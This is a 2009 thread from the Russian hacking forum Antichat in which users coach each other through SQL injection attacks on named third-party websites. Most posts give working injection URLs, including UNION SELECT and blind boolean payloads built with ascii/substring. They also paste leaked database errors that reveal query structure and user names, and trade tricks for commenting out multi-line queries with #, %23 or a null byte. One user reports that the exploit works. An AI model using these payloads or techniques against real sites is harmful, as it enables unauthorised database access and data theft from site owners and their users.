HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 745 из 2422 « Первая < 245645695735 741 742 743 744 745 746 747 748 749 75579584512451745 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.06.2009, 16:09
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
Snap, там 4 ветка - информатион_счема вообще нету

Юзай мор1ров, подбирай имя таблицы

http://www.delocrat.ru/index.php?productID=1324+and+1=if(ascii(substring( (select+1+from+[имя_табл]+limit+0,1),1,1))>1,1,(select+1+union+select+2))

Либо попробуй найти вывод в других местах
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 08.06.2009, 16:13
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
С нами: 10137645

Репутация: 82
По умолчанию
Цитата:
Snap, там 4 ветка - информатион_счема вообще нету
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +information_schema.columns--

Цитата:
Access denied for user 'delocr01'@'%' to database 'information_schema' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from information_schema.columns--
 
Ответить с цитированием

  #3  
Старый 08.06.2009, 16:24
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию
Цитата:
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +information_schema.columns--
Ты ошибку то читал.....
те так и пишут
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'information_schema.columns--'
 
Ответить с цитированием

  #4  
Старый 08.06.2009, 16:31
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
Snap, напиши так

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +skjdhfjkshk234k34h.columns--

Будет

Цитата:
Access denied for user 'delocr01'@'%' to database 'skjdhfjkshk234k34h' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from skjdhfjkshk234k34h.columns--
Из этого по твоему следует, что существует база skjdhfjkshk234k34h к которой у нас нету доступа ?)
 
Ответить с цитированием

  #5  
Старый 08.06.2009, 19:10
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию
Натолкнулся на mysql инъекцию в многострочном запросе,
Цитата:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = 145 [INJECT] GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?
 
Ответить с цитированием

  #6  
Старый 08.06.2009, 21:28
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
Цитата:
Сообщение от prescott  
Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?
маниа.ком ?

Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5
 
Ответить с цитированием

  #7  
Старый 08.06.2009, 22:37
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию
Цитата:
prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7
первое что попробовал - не помогло
Цитата:
Сообщение от ElteRUS  
маниа.ком ?

Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5
Тоже уже сплоит работает =)
 
Ответить с цитированием

  #8  
Старый 08.06.2009, 19:20
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию
попробуй # в качестве комментария
 
Ответить с цитированием

  #9  
Старый 08.06.2009, 20:09
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию
Цитата:
Сообщение от Krist_ALL  
попробуй # в качестве комментария
Вставил - в запросе не появляется. Подставил как %23 - появилась, но комментится так же одна строка
 
Ответить с цитированием

  #10  
Старый 08.06.2009, 20:02
}{@r}{imon
Новичок
Регистрация: 09.05.2009
Сообщений: 8
С нами: 8950862

Репутация: 0
По умолчанию
потскажите если на сайте версия 4,0,2 какие могут быть таблицы старые не идут
 
Ответить с цитированием
Ответ
Страница 745 из 2422 « Первая < 245645695735 741 742 743 744 745 746 747 748 749 75579584512451745 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.